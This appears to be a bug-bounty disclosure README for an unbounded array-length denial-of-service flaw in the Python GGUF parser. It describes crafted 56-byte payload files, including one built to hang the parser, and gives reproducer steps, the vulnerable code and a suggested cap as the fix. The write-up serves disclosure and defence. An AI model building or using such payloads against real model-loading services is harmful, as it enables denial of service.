GGUF MFV: Unbounded array-length DoS in gguf-py Python parser
huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).
This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).
Bug class
CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).
gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. There is no upper cap and no file-size consistency check. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) does enforce a cap, GGUF_MAX_ARRAY_ELEMENTS (1024 * 1024 * 1024 elements); that protection was not propagated to the Python parser.
Payloads in this repo
| File | Size | Declared alen | Observed parse time (Python 3.13) |
|---|---|---|---|
| array_len_10000.gguf | 56 bytes | 10,000 | 0.05 s |
| array_len_100000.gguf | 56 bytes | 100,000 | 0.42 s |
| array_len_1000000.gguf | 56 bytes | 1,000,000 | 9.15 s |
| malicious_array_len.gguf | 56 bytes | weaponized value | parser hangs effectively forever |
| kv_count_10000.gguf | 47 bytes | 10,000 (kv_count branch) | sibling primitive |
| kv_count_100000.gguf | 47 bytes | 100,000 (kv_count branch) | sibling primitive |
| kv_count_1000000.gguf | 47 bytes | 1,000,000 (kv_count branch) | sibling primitive |
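Parse time grows roughly linearly with alen, at about 10 µs per iteration for the 1,000,000-element payload (4 to 5 µs per iteration for the two smaller ones). Extrapolating at that rate: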
| alen | Parse time |
|---|---|
| 10^7 | ~91 s |
| 10^8 | ~15 min |
| 10^9 (matches the C++ sibling cap) | ~2.5 hours |
| 10^12 | ~110 days |
| 2^64 - 1 (UINT64 max) | ~5.8 million years |
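The extrapolation above is plain multiplication of the declared length by a per-iteration cost. A minimal sketch of that arithmetic follows; the function names are hypothetical, and the default of 10 µs per iteration is the approximate rate quoted above, not a fresh measurement.

```python
# Rough parse-time extrapolation from a measured per-iteration cost.
# All names here are illustrative; the default cost is the ~10 us/iter
# figure quoted in this README, which will vary by machine and Python version.

SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY


def estimated_parse_seconds(alen: int, per_iter_us: float = 10.0) -> float:
    """Estimate parse time in seconds, assuming cost stays linear in alen."""
    return alen * per_iter_us * 1e-6


def humanize(seconds: float) -> str:
    """Render a duration using the largest unit that fits."""
    units = (
        ("years", SECONDS_PER_YEAR),
        ("days", SECONDS_PER_DAY),
        ("hours", 3600),
        ("minutes", 60),
    )
    for unit, size in units:
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    for alen in (10**7, 10**8, 10**9, 10**12, 2**64 - 1):
        print(f"alen={alen}: {humanize(estimated_parse_seconds(alen))}")
```

Passing `per_iter_us=9.15` reproduces the rate implied by the 1,000,000-element measurement; the linearity assumption is untested beyond that size.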
Reproducer
pip install gguf
python poc_gguf_py_array_length_dos.py
The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.
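For orientation, the byte layout of such a 56-byte file can be sketched with `struct` alone. This is an illustration under stated assumptions, not the reproducer script itself: it assumes the GGUF v3 little-endian layout (magic, version, tensor_count, kv_count, then one key/value pair), and the 8-byte key name `poc.data` and the helper names are hypothetical. The payloads in this repo may differ in key name and element type.

```python
import struct

# Assumed constants from the GGUF format: value-type codes UINT8 = 0, ARRAY = 9.
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_ARRAY = 9


def build_minimal_array_gguf(alen: int, key: bytes = b"poc.data") -> bytes:
    """Build a header plus one array-typed KV that declares alen elements
    but carries no element data (hypothetical helper)."""
    # magic (4) + version u32 (4) + tensor_count u64 (8) + kv_count u64 (8)
    header = struct.pack("<4sIQQ", GGUF_MAGIC, GGUF_VERSION, 0, 1)
    # key: u64 length prefix followed by the raw key bytes
    kv = struct.pack("<Q", len(key)) + key
    # value type u32 = ARRAY
    kv += struct.pack("<I", GGUF_TYPE_ARRAY)
    # array item type u32, then the declared element count u64
    kv += struct.pack("<IQ", GGUF_TYPE_UINT8, alen)
    return header + kv


def declared_alen(blob: bytes) -> int:
    """Read back the declared array length from the last 8 bytes."""
    return struct.unpack_from("<Q", blob, len(blob) - 8)[0]


if __name__ == "__main__":
    blob = build_minimal_array_gguf(10_000)
    print(len(blob), declared_alen(blob))
```

With an 8-byte key the total is 24 + 8 + 8 + 4 + 4 + 8 = 56 bytes, which matches the payload size listed above. The declared length occupies the final eight bytes, so the file size is independent of alen.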
Sink (verbatim)
llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:

    if gtype == GGUFValueType.ARRAY:
        raw_itype = self._get(offs, np.uint32)
        offs += int(raw_itype.nbytes)
        alen = self._get(offs, np.uint64) # attacker-controlled length
        offs += int(alen.nbytes)
        aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
        data_idxs: list[int] = []
        for idx in range(alen[0]): # unbounded iteration
            curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
            if idx == 0:
                types += curr_types
            idxs_offs = len(aparts)
            aparts += curr_parts # list growth per iter
            data_idxs += (idx + idxs_offs for idx in curr_idxs)
            offs += curr_size
        return offs - orig_offs, aparts, data_idxs, types
Suggested fix
Mirror the C++ cap:

    GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024 # 1 GiB element cap
    GGUF_MAX_STRING_LENGTH = 1024 * 1024 * 1024 # 1 GiB string cap

    if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
        raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")
The same protections are needed for the tensor_count and kv_count reads at line 165.
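A fixed cap still permits a long loop on a tiny file, so a file-size consistency check is a natural complement. The sketch below is one possible shape for such a check and is not code from gguf-py: `validate_array_length`, `item_size`, and `bytes_remaining` are hypothetical names, and the caller is assumed to know the minimum encoded size of one element (for example 1 for UINT8, or 8 for the length prefix of a string).

```python
# Hypothetical pre-loop validation combining a hard cap with a check that
# the declared elements could physically fit in the rest of the file.

GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024  # same value as the cap suggested above


def validate_array_length(
    alen: int,
    item_size: int,
    bytes_remaining: int,
    max_elements: int = GGUF_MAX_ARRAY_ELEMENTS,
) -> int:
    """Return alen as a Python int, or raise ValueError if it is implausible.

    item_size is the minimum number of bytes one element occupies on disk;
    bytes_remaining is the file size minus the current read offset.
    """
    alen = int(alen)  # also converts NumPy integer scalars
    if alen > max_elements:
        raise ValueError(f"GGUF array length {alen} exceeds max {max_elements}")
    if item_size > 0 and alen * item_size > bytes_remaining:
        raise ValueError(
            f"GGUF array declares {alen} elements of at least {item_size} bytes, "
            f"but only {bytes_remaining} bytes remain in the file"
        )
    return alen
```

Under these assumptions a 56-byte file declaring 10,000 UINT8 elements is rejected before the first iteration, since no bytes remain after the length field. The same pattern could be applied to tensor_count and kv_count with a per-entry minimum size.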
Disclosure status
Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. This finding belongs to the same primitive class as this researcher's six prior MFV memory-amplification findings on npy, npz, messagepack, pickle, parquet, and onnx (May 2026).
The maintainers of ggml-org/llama.cpp are being notified through the huntr disclosure flow.